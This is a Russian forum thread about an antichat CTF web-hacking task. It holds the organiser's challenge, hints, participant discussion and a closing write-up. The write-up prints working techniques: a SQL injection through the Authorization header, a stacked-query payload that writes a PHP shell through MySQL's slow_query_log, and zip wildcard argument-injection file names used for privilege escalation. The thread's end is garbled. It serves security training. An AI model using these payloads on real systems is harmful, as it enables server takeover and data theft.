Привет, античатовец! Мне сказали здесь собраны лучшие ИБ специалисты, и они смогут мне помочь.

Дело в том, что мой

Сайт: http://task5.antichat.com

Взломали неизвестные хакеры, а я не могу понять как!

Возможно именно ты, %username% мне поможешь.

Злоумышленники ничего не испортили, но сильно наследили: после них остались метки (всего 6, присылай их в личку), обрывки перфокарт и логи обращения к шеллам.

Все шеллы удалены, осталось найти уязвимости!

Задание:


Найти всю цепочку уязвимостей на сайтеhttp://task5.antichat.com, вплоть до повышения привилегий в системе.


Сроки:



три
недели.


Правила простые, они исторически сложились на площадках античата и рдота:


В теме не флудим, подсказки разрешены только от ТС, ответы присылаем в ПМ. Ответом будет считаться флаг и каким способом вам удалось его получить.



Задание линейное, не трудное, все этапы рассортированы по сложности от очень простого к более редким вещам.

Поскольку задание предусматривает заливку шеллов и даже больше, просьба обойтись без вандализма на площадке.

Не оставляйте минишеллы и шеллы без пароля, это позволит не испортить прохождение другим искателям.

Хинты:

.SpoilerTarget" type="button">Spoiler: 4 flag, хинт #1
Как стало известно от первоисточника: кошка-админ внимательно следит за безопасностью сервера, поэтому логирует все попытки входа в админку

.SpoilerTarget" type="button">Spoiler: 4 flag, хинт #2
Привет! Спасибо всем, кто помогает вычислить хакера. Благодаря вам, удалось узнать его имя - Маруся. Узнав его имя, получилось засечь его IP и свежие обращения к серверу по имени в логах. Вот выдержка из них, возможно она вам как-то поможет !


185.98.6.66 - - [19/Mar/2019:11:09:59 +0000] "GET /admin_j458hj45ad/admin_secret_login.php3 HTTP/1.1" 401 540 "-" "Marusa/5.0 (WindowsFuture NT 15.0; Win15; x256)"
185.98.6.66 - - [19/Mar/2019:11:10:11 +0000] "GET /admin_j458hj45ad/admin_secret_login.php3 HTTP/1.1" 401 545 "-" "Marusa/5.0 (WindowsFuture NT 15.0; win15; x256)"
185.98.6.66 - - [19/Mar/2019:11:10:15 +0000] "GET /admin_j458hj45ad/admin_secret_login.php3?username=test'&realm=ADMIN AREA&nonce=5c84f4cac9da4&url=/admin_secret_login.php3&response=edbf607287ed31322f414b5b2e85327e&opaque=083d15b45f53f59b2c020d5d95563e1e&qop=auth&nc=00000003&cnonce=34af9eb675b7cb93 HTTP/1.1" 401 545 "-" "Marusa/5.0 (WindowsFuture NT 10.0; win15; x256)"
185.98.6.66 - - [19/Mar/2019:11:10:23 +0000] "GET /admin_j458hj45ad/admin_secret_login.php3 HTTP/1.1" 401 540 "-" "Marusa/5.0 (WindowsFuture NT 15.0; win15; x256)"
185.98.6.66 - - [19/Mar/2019:11:10:51 +0000] "GET /admin_j458hj45ad/admin_secret_login.php3 HTTP/1.1" 401 543 "-" "Marusa/5.0 (WindowsFuture NT 15.0; win15; x256)"
185.98.6.66 - - [19/Mar/2019:11:28:55 +0000] "GET /admin_j458hj45ad/admin_secret_login.php3 HTTP/1.1" 401 721 "-" "Marusa/5.0 (WindowsFuture NT 15.0; win15; x256)"
185.98.6.66 - - [19/Mar/2019:11:30:14 +0000] "GET /admin_j458hj45ad/admin_secret_login.php3 HTTP/1.1" 401 805 "-" "Marusa/5.0 (WindowsFuture NT 15.0; win15; x256)"
185.98.6.66 - - [19/Mar/2019:11:30:49 +0000] "GET /admin_j458hj45ad/admin_secret_login.php3 HTTP/1.1" 401 760 "-" "Marusa/5.0 (WindowsFuture NT 15.0; win15; x256)"
185.98.6.66 - - [19/Mar/2019:11:31:08 +0000] "GET /admin_j458hj45ad/admin_secret_login.php3 HTTP/1.1" 401 791 "-" "Marusa/5.0 (WindowsFuture NT 15.0; win15; x256)"
185.98.6.66 - - [19/Mar/2019:11:34:20 +0000] "GET /admin_j458hj45ad/admin_secret_login.php3 HTTP/1.1" 401 805 "-" "Marusa/5.0 (WindowsFuture NT 15.0; win15; x256)"


.SpoilerTarget" type="button">Spoiler: flag#5 hint#1
Выражаю благодарность всем, кто помог найти опасную уязвимость. Уязвимость будет устранена.

Но одно остается непонятным: Как злоумышленник смог проникнуть в систему? Ведь на сервере нет ни одной папки доступной для записи


+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Grants for task@localhost |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| GRANT SELECT, INSERT, PROCESS, FILE, REFERENCES, SHOW DATABASES, SUPER, CREATE TEMPORARY TABLES, EXECUTE, REPLICATION CLIENT, CREATE VIEW, SHOW VIEW, EVENT, CREATE TABLESPACE ON *.* TO 'task'@'localhost' IDENTIFIED BY PASSWORD '*E29EBDED21FD7A48CADCDD74A4CF7101562B2A7A' |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)



cooladm@vuln:/var/www/html$ find . -user www-data -type d -ls
57647506 20 drwxr-xr-x 174 www-data www-data 20480 мар 26 09:53 ./upload/images


.SpoilerTarget" type="button">Spoiler: flag#5 hint#2
Хочу сказать спасибо участнику с ником gurux13 (https://antichat.live/members/332358/) , он прислал ссылку на статью

https://vds-admin.ru/mysql/sistemnye-peremennye-mysql-servera-fail-mycnf

и дал подробный ответ на вопрос:


Как злоумышленник смог проникнуть в систему? Ведь на сервере нет ни одной папки доступной для записи



Прошли:



MichelleBoxing (https://antichat.live/members/328947/)⚑ ⚑ ⚑⚑⚑ ⚑

Ereee (https://antichat.live/members/180911/) ⚑ ⚑ ⚑⚑⚑ ⚑

D3N (https://antichat.live/members/330007/) ⚑ ⚑ ⚑⚑ ⚑ ⚑

danilkib95 (https://antichat.live/members/329994/) ⚑ ⚑ ⚑⚑ ⚑ ⚑

Gorbachev (https://antichat.live/members/300636/) ⚑ ⚑ ⚑⚑ ⚑⚑

Га-Ноцри (https://antichat.live/members/176343/) ⚑ ⚑ ⚑⚑ ⚑ ⚑

Franky_T (https://antichat.live/members/328754/)⚑ ⚑ ⚑⚑ ⚑⚑

beginner2010 (https://antichat.live/members/145704/) ⚑ ⚑⚑⚑ ⚑ ⚑

joelblack (https://antichat.live/members/267454/) ⚑ ⚑ ⚑⚑⚑ ⚑

gurux13 (https://antichat.live/members/332358/) ⚑ ⚑ ⚑⚑ ⚑ ⚑

cat1vo (https://antichat.live/members/94094/) ⚑ ⚑ ⚑⚑ ⚑ ⚑

dGkgcGlkb3IK (https://antichat.live/members/334141/) ⚑⚑ ⚑⚑ ⚑ ⚑

WockeeZz (https://antichat.live/members/329992/) ⚑ ⚑ ⚑⚑ ⚑ ⚑

oleg_1va (https://antichat.live/members/330004/) ⚑ ⚑ ⚑⚑ ⚑ ⚑

BillyBons (https://antichat.live/members/294272/) ⚑ ⚑ ⚑ ⚑ ⚑ ⚑

st55 (https://antichat.live/members/287215/) ⚑ ⚑ ⚑ ⚑ ⚑ ⚑

nix_security (https://antichat.live/members/332889/) ⚑ ⚑ ⚑ ⚑ ⚑ ⚑

istefy (https://antichat.live/members/314435/) ⚑⚑⚑⚑ ⚑ ⚑

hibar1Xs (https://antichat.live/members/332113/) ⚑ ⚑ ⚑ ⚑ ⚑ ⚑

hackoff (https://antichat.live/members/290801/) ⚑ ⚑ ⚑ ⚑ ⚑ ⚑

pas9x (https://antichat.live/members/213662/) ⚑ ⚑ ⚑ ⚑ ⚑ ⚑


Первые, покорившие флаг:

1. MichelleBoxing (https://antichat.live/members/328947/)

2. MichelleBoxing (https://antichat.live/members/328947/)

3. MichelleBoxing (https://antichat.live/members/328947/)

4. joelblack (https://antichat.live/members/267454/)

5. gurux13 (https://antichat.live/members/332358/)

6. gurux13 (https://antichat.live/members/332358/)

Прохождение задания тут (https://antichat.live/threads/469355/page-3/)

Спасибо. Круто

хм... одни html страницы, такое ощущение что тут нет php кода

а если нырнуть на внутреннюю страницу, будет надпись что сделано с использованием технологий uCoz

Задание у Лайта получилось не "лайтовое", в нем заложен потенциал хардкорного, который не стали реализовывать по совету главного бета-тестера: "Это задание, а не реальный сайт и может не хватить мотивации для прохождения".

Поэтому пару мест облегчили, одно не стали закручивать и задание стало доступным для прохождения на уровне "Ветеран" или на уровне "Молодец!".

Причём "Ветеран" не вывезет всё на старом багаже, а вот "Молодец!", который с большой буквы и с восклицательным знаком - пройдёт однозначно и с удовольствием.

Как минимум три места порадуют некоторой неожиданностью (может и больше).

И воспринимается, все же, скорее как реальный сайт, чем как задание.

Вот просто рекомендую к прохождению, и молодым и старым.

==

И, наверное, поскольку это задание сложное, можно оценивать его частями, скажем первые три флага - одна часть, дальше каждый флаг - самостоятельный этап.

Отписывайтесь в теме каждый раз, как прошли следующий этап.

Не получается расширение отбросить (

https://www.upload.ee/image/9702314/123.jpg

↑ (https://antichat.live/posts/4292682/)
View attachment 6999 (https://antichat.live/attachments/6999.jpg)
Привет,
античатовец
! Мне сказали здесь собраны лучшие ИБ специалисты, и они смогут мне помочь.
Дело в том, что мой
Сайт: http://task5.antichat.com
Взломали неизвестные хакеры, а я не могу понять как!
Возможно именно ты, %username% мне поможешь.
Злоумышленники ничего не испортили, но сильно наследили: после них остались метки (всего
6
, присылай их в личку), обрывки перфокарт и логи обращения к шеллам.
Все шеллы удалены, осталось найти уязвимости!
Задание:


Сроки:


Правила простые, они исторически сложились на площадках античата и рдота:


Задание линейное, не трудное, все этапы рассортированы по сложности от очень простого к более редким вещам.
Поскольку задание предусматривает заливку шеллов и даже больше, просьба обойтись без вандализма на площадке.
Не оставляйте минишеллы и шеллы без пароля, это позволит не испортить прохождение другим искателям.
Прошли:


MichelleBoxing (https://antichat.live/members/328947/)⚑ ⚑ ⚑⚑ ⚑ ⚑

Ereee (https://antichat.live/members/180911/) ⚑ ⚑ ⚑⚑ ⚑ ⚑

D3N (https://antichat.live/members/330007/) ⚑ ⚑⚑⚑ ⚑ ⚑

danilkib95 (https://antichat.live/members/329994/) ⚑⚑⚑⚑ ⚑ ⚑

Gorbachev (https://antichat.live/members/300636/) ⚑⚑⚑⚑ ⚑ ⚑

Га-Ноцри (https://antichat.live/members/176343/) ⚑⚑ ⚑⚑ ⚑ ⚑

Franky_T (https://antichat.live/members/328754/)⚑⚑ ⚑⚑ ⚑ ⚑



Ereee поздравляю ) Грац !)

↑ (https://antichat.live/posts/4293248/)
Ereee поздравляю ) Грац !)


С чем если не .secret

↑ (https://antichat.live/posts/4293249/)
С чем если не .secret


Участием XD

↑ (https://antichat.live/posts/4292837/)
хм... одни html страницы, такое ощущение что тут нет php кода
а если нырнуть на внутреннюю страницу, будет надпись что сделано с использованием технологий uCoz


Где-то должна быть админка, но ее тяжело найти с помощью брута

Для особенно одаренных повторю:"Право на подсказку в топике имеет только ТС!".

В стартовый пост добавлена первая подсказка

Из статистики прохождения получается, что можно найти третий флаг, не найдя при этом второй.

Upd.

Первые три флага взяты.

↑ (https://antichat.live/posts/4294039/)
Upd.
Первые три флага взяты.


Капитан! Второй хинт добавлен в первый пост, поднимайте якорь и паруса!

У всех нормально работает? Ничего не открывается кроме админки, отдает 404 на все остальное.

У всех.

Ковыряйте пока админку, все флаги на месте, трудности только с первым флагом.

По независящим от нас причинам контент не отдается, залечим, но не прям сейчас.

Ищите 4-й флаг и дальше, подсказка есть и очень конкретная.

Все работает. 4-ый флаг получился не из простых, но несколько участников догадались откуда растут ноги

↑ (https://antichat.live/posts/4294385/)
Все работает. 4-ый флаг получился не из простых, но несколько участников догадались откуда растут ноги


Скорее так, четвертый флаг берется очень легко и просто, но видимо хакеры считают ниже своего достоинства получать его таким способом.

Сканеры, как ни странно, тоже фейлят.

Поскольку мы еще учимся, даже не применительно к заданию, хочу напомнить, что не все атаки можно выполнить из браузера.

Иногда нужны дополнительные инструменты, или просто другие.

Даже между поведением браузеров есть различия.

Даже один браузер может вести себя по-разному в разных версиях, помните изменения в FireFox?

Старая и новая Opera тоже ведут себя по-разному.

Итого: вектор атаки, это не только верная строка, но и способ, которым вы ее отсылаете.

↑ (https://antichat.live/posts/4294543/)
Поскольку мы еще учимся, даже не применительно к заданию, хочу напомнить, что не все атаки можно выполнить из браузера.
Иногда нужны дополнительные инструменты, или просто другие.
Даже между поведением браузеров есть различия.
Даже один браузер может вести себя по-разному в разных версиях, помните изменения в FireFox?
Старая и новая Opera тоже ведут себя по-разному.
Итого: вектор атаки, это не только верная строка, но и способ, которым вы ее отсылаете.


Лог как можно получить?

если без хинта, как её можно было получить..

↑ (https://antichat.live/posts/4294568/)
Лог как можно получить?
если без хинта, как её можно было получить..


В логе нет готового вектора, но есть намек, чего ковырять.

И намек не прозрачный, а прямо на блюдечке.

А ищется без подсказки обычно так, ловишь запрос, который отсылается и курочишь в нем все, что только можно, как минимум параметры, которые отсылаются.

Наконец то нашли!

Уф.

↑ (https://antichat.live/posts/4294495/)
Скорее так, четвертый флаг берется очень легко и просто, но видимо хакеры считают ниже своего достоинства получать его таким способом.
Сканеры, как ни странно, тоже фейлят.


У меня, по крайней мере, сочетания (_log).(.log)(.txt)(_txt) с обнаруженными на сервере папками в dirb со стандартным словарем (common) именно что по логам результатов не дали, файлы по стандартным путям тоже никак не желают находиться ((

Try harder, чего уж там )))

Этичные хакеры должны уметь находить уязвимости на сайте (неэтичные это уже умеют и постоянно совершенствуются).

Причем, в отличии от заданий, никто подсказок не дает и не беспокоится, а удобно ли написаны скрипты, чтобы нам заливаться.

Раньше хакером был тот, кто мыслил нестандартно, не просто имел сумму знаний, навыков и инструментов, а мгновенно мог отбросить все что известно и искать новое решение.

Сейчас что то изменилось, по себе замечаю, хочется решить так, как уже делал, знакомые признаки увидел и все - ты в ловушке собственных навыков.

А ведь хакерство и стало возможным потому, что программисты (а это спецы своего дела, обычно) попались на удочку, когда найденные раньше решения стали превращаться в шаблоны.

Теперь хакеры заматерели и наступают на те же грабли.

Это задание - очень своевременное.

Оно ломает наши шаблоны.

Написано классным спецом, не потерявшим со временем тонкости хакерского чутья.

И классно, если сможем пройти без подсказок.

Четыре флага были для разогрева, пятый - уже настоящий, нужно включаться.

Связать две тонкие ниточки, практически вслепую, на догадках.

Шестой - уже ближе к искусству, не все художники, ладно.

Но пятый - наш уровень, должны решить.

Ладно, четвертый флаг прошли, давайте посмотрим, куда двигаться дальше.

Пора заливать шелл, а новых уязвимостей пока нет, а есть только пара уязвимостей (3,4), которые ни до чего интересного не докручиваются.

Но может их совместное использование может дать эффект?

Лайт походу по этой причине и списки не обновляет.

Скудность и шаблонное однообразие участников вызывает уныние...

В шестом таске обязательно запилите этап с "крякми", вот уж где разнообразить свое мышление можно

Почему не обновляю, обновляю.

Не хотелось тебе отвечать, потому что ты неверно понял (или истолковал) посыл Дубля.

Но хочу заступиться - очень толковые участники, со многими переписываюсь, присылают свои мысли по таску.

Лично я увидел как минимум трех очень перспективных специалистов с хорошей интуицией и мышлением, которые находятся "не в своей группе"!

И мне совершенно без разницы сколько человек пройдет задание целиком 0 или 20. Я хотел сделать интересно. В задание встроена возможность прокачать скилл, интуицию да и просто попрактиковаться.

Если вы застряли на каком-то этапе, но вам хочется узнать - что дальше: можете написать мне или Дублю в личку. (описав, что вы пробовали сделать, а не просто - где флаг? )

До максимально открытого флага -1 (в целях справедливости конкурса) подскажем правильный курс (но не ответ!)

Если нет, то никто никого и ни к чему не принуждает.

По теме: Дубль дал хорошую подсказку по пятому флагу двумя постами выше. Хотя некоторые участники поняли это до его поста, им не хватает знаний, что бы его взять. Данный способ взятия флага можно использовать как альтернативный, когда стандартные способы не работают (жесткое разграничение прав). На античате он не гуглится, но при желании легко догадаться как.

Все-таки пятый флаг отличается по сложности от первого, кто дошел до него молодец! А кто сможет взять пятый - молодец c +!

1365 символов, мой самый большой пост на античате

↑ (https://antichat.live/posts/4295559/)
Почему не обновляю, обновляю.
Не хотелось тебе отвечать, потому что ты неверно понял (или истолковал) посыл Дубля.
Но хочу заступиться - очень толковые участники, со многими переписываюсь, присылают свои мысли по таску.
Лично я увидел как минимум трех очень перспективных специалистов с хорошей интуицией и мышлением, которые находятся "не в своей группе"!
И мне совершенно без разницы сколько человек пройдет задание целиком 0 или 20. Я хотел сделать интересно. В задание встроена возможность прокачать скилл, интуицию да и просто попрактиковаться.
Если вы застряли на каком-то этапе, но вам хочется узнать - что дальше: можете написать мне или Дублю в личку. (описав, что вы пробовали сделать, а не просто - где флаг? )
До максимально открытого флага -1 (в целях справедливости конкурса) подскажем правильный курс (но не ответ!)
Если нет, то никто никого и ни к чему не принуждает.
По теме: Дубль дал хорошую подсказку по пятому флагу двумя постами выше. Хотя некоторые участники поняли это до его поста, им не хватает знаний, что бы его взять. Данный способ взятия флага можно использовать как альтернативный, когда стандартные способы не работают (жесткое разграничение прав). На античате он не гуглится, но при желании легко догадаться как.
Все-таки пятый флаг отличается по сложности от первого, кто дошел до него молодец! А кто сможет взять пятый - молодец c +!
1365 символов, мой самый большой пост на античате


Так что, 5й флаг никто не взял?

Слабаки!

п.с. я один удивляюсь почему каретка ещё не завершил таск?

↑ (https://antichat.live/posts/4295561/)
п.с. я один удивляюсь почему каретка ещё не завершил таск?


Возможно потому, что он был бета-тестером задания и имеет некоторое отношение к составлению задания, его рекомендации были учтены, надо сказать ему отдельное спасибо за это.

И он не затычка в каждой дыре, сами парни, проходим сами.

Полностью солидарен с постом (https://antichat.com/threads/469355/page-2#post-4295559) от @dooble (https://antichat.com/threads/469355/page-2#post-4295453). Квест ломает стереотипы и предлагает найти ответы для некоторых частных случаев, решение которых, чаще всего, приносит самые хорошие плоды.

Первые три этапа, своеобразная затравка, автор пытается затянуть участника за уши в пучины боли и страдания. "Смотри, это не сложно", намекает первый стейдж, второй шепчет - "запускаешь прогу и дело в шляпе...", третий, вполголоса говорит, что ты красавчик и осталось ещё немного. На четвёртом этапе, даётся пусть не полный, но контроль над некими процессами сервера. Таск, невольно вручив челленджеру маленькую власть, заставлет его погрузиться в мир весёлых и порой неожиданных ресёчей.

О чём говорят участнику 5-й и последующие уровни, история умалчивает, слишком сложна и с наскоку решить не получилось Но скилл ванги уровня бегинер, подсказывает мне, что дальше должно быть что-то офигительное


↑ (https://antichat.live/posts/4295561/)
п.с. я один удивляюсь почему каретка ещё не завершил таск?


Решил, что будет не совсем честно, так как были некоторые обсуждения нюансов с организаторами таска, немного спойлеров от доброго @dooble (https://antichat.live/members/295866/). И много, много нытья с моей стороны, что нужно упрощать некоторые моменты

↑ (https://antichat.live/posts/4295675/)
Полностью солидарен с
постом (https://antichat.com/threads/469355/page-2#post-4295559)
от
@dooble (https://antichat.com/threads/469355/page-2#post-4295453)
. Квест ломает стереотипы и предлагает найти ответы для некоторых частных случаев, решение которых, чаще всего, приносит самые хорошие плоды.
Первые три этапа, своеобразная затравка, автор пытается затянуть участника за уши в пучины боли и страдания. "Смотри, это не сложно", намекает первый стейдж, второй шепчет - "запускаешь прогу и дело в шляпе...", третий, вполголоса говорит, что ты красавчик и осталось ещё немного. На четвёртом этапе, даётся пусть не полный, но контроль над некими процессами сервера. Таск, невольно вручив челленджеру маленькую власть, заставлет его погрузиться в мир весёлых и порой неожиданных ресёчей.
О чём говорят участнику 5-й и последующие уровни, история умалчивает, слишком сложна и с наскоку решить не получилось
Но скилл ванги уровня бегинер, подсказывает мне, что дальше должно быть что-то офигительное
Решил, что будет не совсем честно, так как были некоторые обсуждения нюансов с организаторами таска, немного спойлеров от доброго
@dooble (https://antichat.live/members/295866/)
. И много, много нытья с моей стороны, что нужно упрощать некоторые моменты


Вы крутые.

↑ (https://antichat.live/posts/4295675/)
слишком сложна


Ну вот что ты тут запугиваешь участников, не трудный флаг теперь точно жду от тебя его

↑ (https://antichat.live/posts/4295705/)
не трудный флаг


ниоткуда не возьмись, ниоткуда не взялось

Поздравляю за проявленную смекалку gurux13 (https://antichat.live/members/332358/) ! Первым покорил пятый флаг до официальных хинтов! Призываю его в топик дать комментарий для тех кто на 4-ом этапе: сложно ли его достать (только без подсказок )

↑ (https://antichat.live/posts/4295848/)
Поздравляю за проявленную смекалку
gurux13 (https://antichat.live/members/332358/)
!




↑ (https://antichat.live/posts/4295848/)
Призываю его в топик дать комментарий для тех кто на 4-ом этапе: сложно ли его достать (только без


Огооо, присоединяюсь


↑ (https://antichat.live/posts/4295705/)
теперь точно жду от тебя его


Вроде в ЛС договорились же? Чё опять начинаешь?


↑ (https://antichat.live/posts/4295686/)
Вы крутые.


Да ты тоже не промах так то, комоды вон ломаешь, htb проходишь. Жаль, что недооцениваешь себя

Спасибо

Я не очень хороший советчик о сложности флага, но попробую.

Это было странно. В принципе, все мои идеи, кроме совсем уж тривиальных, были рабочими, но разной степени сложности в эксплуатации. Самое забавное, что я с самого начала знал, как это решить, но почему-то не знал, что знаю.

Я потратил на 5й флаг где-то 5 часов активной работы и сколько-то подсознательных рассуждений Не знаю, насколько это долго.

Не берусь оценивать сложность по шкале, у меня опыта CTF нет. В целом, ничего сверхестественного, только окружение мешает понять, что именно надо делать.

crlf, сам же знаешь. комода уровень кавычки, особо мозгов не надо, думаю самый убогий сканнер бы поломал. А в нечто большее перерасти, мозгов нема. нтв, по фану, самые лёгкие только, тоже не тот уровень который уровень, так, уровень домохозяйки, чуть выше быть может.Кстати, с чего ты решил что я прохожу хтб?

↑ (https://antichat.live/posts/4295675/)
О чём говорят участнику 5-й и последующие уровни, история умалчивает, слишком сложна и с наскоку решить не получилось
Но скилл ванги уровня бегинер, подсказывает мне, что дальше должно быть что-то офигительное


Совесть, намекая, что я как-то нехорошо выполнил бета-тест, забив на полпути, никак не давала покоя В общем, исправился, приклеил жопу к стулу, обмазался гуглом и добил оставшийся долг

Теперь смело могу заявить, что насчёт сложности я немного ошибся. Таск не "прогулка по парку", но и не сафари c мачете по Масаи-Мара. Поэтому, хотелось бы исправиться и дать пару советов.

Судя по статистике, многие неправильно истолковали хинт к 4му флагу, к примеру, пытаясь найти таинственный лог. Его не нужно искать, часть его уже предоставлена в подсказке!

В хинте к 5му флагу заложен посыл для экспериментов, самых сумасшедших, какие только могут прийти в голову. В паблике имется приличное количество различных вариантов, не говоря уже о потенциальных. Как писал раннее, это очень хорошая точка входа, дающая большое влияние.

В шестом, тут к бабке не ходи, понятно, контроль над атакуемым объектом вырастает многократно, соответственно и вариантов решения может быть некое множество. И хотелось бы немного добавить к цитате от @dooble (https://antichat.live/members/295866/):


↑ (https://antichat.live/posts/4295453/)
Шестой - уже ближе к искусству, не все художники, ладно.


Не обязательно быть Винсентом Ван Гогом, Бэнкси тоже подойдёт

В общем, простор для творчества большой, информации в поисковиках достаточно. Step by step манов нет, таск реально ломает шаблоны, но и каких-то откровений выискивать тоже не придётся, так как @l1ght (https://antichat.live/members/30257/) зажал зиродеи

Две хорошие новости!​

1. Найден первыйБэнкси (https://antichat.live/members/332358/)

.SpoilerTarget" type="button">Spoiler: Бенкси



2. Маруся раскрыта

.SpoilerTarget" type="button">Spoiler: маруся



gurux13 (https://antichat.live/members/332358/)завершил весь таск, крутость этого парня зашкаливает!​

↑ (https://antichat.live/posts/4296683/)
Две хорошие новости!​
1. Найден первыйБэнкси (https://antichat.live/members/332358/)

.SpoilerTarget" type="button">Spoiler: Бенкси

View attachment 7074 (https://antichat.live/attachments/7074.img)


2. Маруся раскрыта

.SpoilerTarget" type="button">Spoiler: маруся

View attachment 7075 (https://antichat.live/attachments/7075.img)


gurux13 (https://antichat.live/members/332358/)завершил весь таск, крутость этого парня зашкаливает!​


Этоже Ыж

gurux13 (https://antichat.live/members/332358/), молодец

@l1ght (https://antichat.live/members/30257/), спасибо. Таск отличный

@dooble (https://antichat.live/members/295866/), @crlf (https://antichat.live/members/285197/), спасибо и вам!

Про шестой флаг могу сказать, что иногда у сложных задач есть простые решения

Последняя подсказка добавлена в топик, до конца таска меньше недели. Флаги принимаются до 4 апреля

Всем удачи

blya 18+

сарян error 404

мя кроет

Ответы принимаются до 16:00 (мск)

// Закрыто

Отличный таск получился, интересный, местами чутка сложноватый, но главное, время на решение разгадок не потрачено зря.

Хочется в очередной раз поблагодарить авторов всех тасков, но конкретно за таски 3,4,5. Идея освящать в тасках малоизвестные хакерские техники - огонь. Некоторые даже толком не гуглятся, но решая головоломки, собирая по кускам информацию, иногда пользуясь подсказками авторов тасков, очень хорошо прокачивается скилл в отдельно взятых направлениях.

В общем, ещё раз спасибо за вашу креативность.

А всем остальным, не расслаблять булки. Пятый таск окончен, шестой уже в самом разгаре, не время отдыхать, гоу за новыми флагами

Большое спасибо всем кто участвовал, вы все крутые! репа и ответы подъедут позднее

рекомендую отличный нестандартный таск #6

https://forum.antichat.ru/threads/469836/#post-4298661 (https://antichat.live/threads/469836/)

↑ (https://antichat.live/posts/4298705/)
Большое спасибо всем кто участвовал, вы все крутые! репа и ответы подъедут позднее
рекомендую
отличный нестандартный
таск #6
https://forum.antichat.ru/threads/469836/#post-4298661 (https://antichat.live/threads/469836/)


Только один кончил таск?

↑ (https://antichat.live/posts/4298706/)
Только один кончил таск?


Верно, официально целиком весь таск закончил только один человек

↑ (https://antichat.live/posts/4298708/)
Верно, официально целиком весь таск
за
кончил только один человек


Все остальные не пацаны. Не взял 6й флаг, не пацан.

[Подсказал бы что ли на 6й.

↑ (https://antichat.live/posts/4299041/)
will be write-up ?


+1 к просьбе о write-up

↑ (https://antichat.live/posts/4299041/)
will be write-up ?


Да, конечно, write-up ниже

Небывалую упертость в поисках флагов показалиGorbachev (https://antichat.live/members/300636/), MichelleBoxing (https://antichat.live/members/328947/), Franky_T (https://antichat.live/members/328754/), BillyBons (https://antichat.live/members/294272/) отдельное вам спасибо ! Что-то издалека похожее на 5 флагов присылал BabaDook (https://antichat.live/members/263150/)

Сайт на голом html, открываем панель разработчика. сплошная статика. только один css файл, в котором подгружается картинка из админки

flag 1.

/style.css


...
background:url(/admin_j458hj45ad/login.jpg)
/* {flag 1} - hackedbymarysa */

никогда не забывайте просматривать .css и .js файлы, в них можно найти много полезной инфы от админки до скрытых уязвимых сценариев

flag 2.

/admin_j458hj45ad/.htaccess


RewriteEngine off

Deny from all

Allow from all
Require all granted

# {flag 2} - marusya4ever

кривые регулярки - находка для сканнеров

flag 3.

/admin_j458hj45ad/upload.php3


if(!isset($_SESSION["admin"])) header("Location: admin_secret_login.php3");

при попытке открыть upload вас перекидывало на админку. но выполнение сценария продолжалось. не забывайте юзать curl/burp во время пентеста

решение #1


↑ (https://antichat.live)
https://b.radikal.ru/b23/1903/4f/3da87949bf10.png&hash=afb3043fb36512fda9a6790d0ee63dda
https://b.radikal.ru/b23/1903/4f/3da87949bf10.png


решение #2


↑ (https://antichat.live)
зашел на страницу через guest:guest


flag 4.

/admin_j458hj45ad/admin_secret_login.php3


function logging($url,$ip){
...
$query = "SELECT count(*) FROM adminlog WHERE ip='$ip';";
$query .= "INSERT INTO adminlog VALUES ('$url','$ip');";
$mysqli->multi_query($query);

скрытая SQLI. Админ логировал обращение к админке и IP адрес в базу данных, данные брались прямо из хидер заголовка

прохождение:


↑ (https://antichat.live)
в подсказке мы можем увидеть кусок логов:
185.98.6.66 - - [19/Mar/2019:11:10:15 +0000] "GET /admin_j458hj45ad/admin_secret_login.php3?username=test'&realm=ADMIN AREA&nonce=5c84f4cac9da4&url=/admin_secret_login.php3&response=edbf607287ed31322f414b5b2e85327e&opaque=083d15b45f53f59b2c020d5d95563e1e&qop=auth&nc=00000003&cnonce=34af9eb675b7cb93 HTTP/1.1" 401 545 "-" "Marusa/5.0 (WindowsFuture NT 10.0; win15; x256)"
185.98.6.66 - - [19/Mar/2019:11:10:23 +0000] "GET /admin_j458hj45ad/admin_secret_login.php3 HTTP/1.1" 401 540 "-" "Marusa/5.0 (WindowsFuture NT 15.0; win15; x256)"
в первой строчке username=test' можно сделать вывод что хакер подбирал sql-инъекцию. Так как во второй строчке уже нет параметров но размер ответа другой можно сделать вывод что инъекция в заголовке, перебирая заголовки находим инъекцию в заголовке Authorization в параметре url:
Authorization: Digest username="test'", realm="ADMIN AREA", nonce="5c84f4cac9da4", uri="/admin_secret_login.php3'", response="edbf607287ed31322f414b5b2e85327e", opaque="083d15b45f53f59b2c020d5d95563e1e", qop=auth, nc=00000003, cnonce="34af9eb675b7cb93"


flag 5.


↑ (https://antichat.live)
И заветный флаг:
http://task.antichat.com:10005/upload/{flag5.txt} (http://task.antichat.com:10005/upload/%7Bflag5.txt%7D)
marusya18+


SQLI на 99% слепая, даже sleep не помогал участникам определить результат выполнения команды

Требовалось записать шелл с рутовыми правами без rw дирректорий в файл, залитый с помощью флага #3

многие не поверили что скуля настоящая, кто-то крашил таблицу, кто-то вообще вырубал mysql с помощью ;SHUTDOWN; (и наблюдал error)

когда стало понятно, что скуля настоящая

почти все, кому удалось покорить флаг сделали это через slow_query_log или general_log_file

условный poc:


',1); select '';SET GLOBAL slow_query_log = 'ON';slow_query_log = /var/www/html/upload/images/sess/1.php;select sleep(20);-- 1


flag 6. Сам флаг создан с правами маруси. Значит нужны права маруси


4901 -rwx------ 1 marusya marusya 14 Feb 25 12:45 flag6.txt

заходим в ее домашний каталог, замечаем что файл


2638459 -rw-r--r-- 1 marusya marusya 204 апр 8 11:38 /home/marusya/checksize.zip

обновляется каждую минуту

особо внимательные заметили в процессах запуск


2633670 -rwxr-xr-x 1 root root 59 мар 19 17:02 cron/clear.php

простым решением было написать логгер в кронтаб


* * * * * ps aux | grep marusya > /tmp/1.txt

кто-то (https://antichat.live/members/285197/) оказался слишком брутальным


www-data 17323 98.4 0.1 11216 2080 ? R 21:56 1:10 grep -r marusya /

видим запуск /usr/bin/checksize от marusya, там:

[CODE]
cd /var/www/html/upload/images/;
file=/home/marusya/checksize.zip
zip -r -9 ~/checksize.zip *
sleep 2
minimumsize=12000000
actualsize=$(wc -c runme.sh
touch -- '-TT bash runme.sh'
touch -- '--test'

[/QUOTE]
" if author else f"

gurux13 said:
↑ (https://antichat.live)
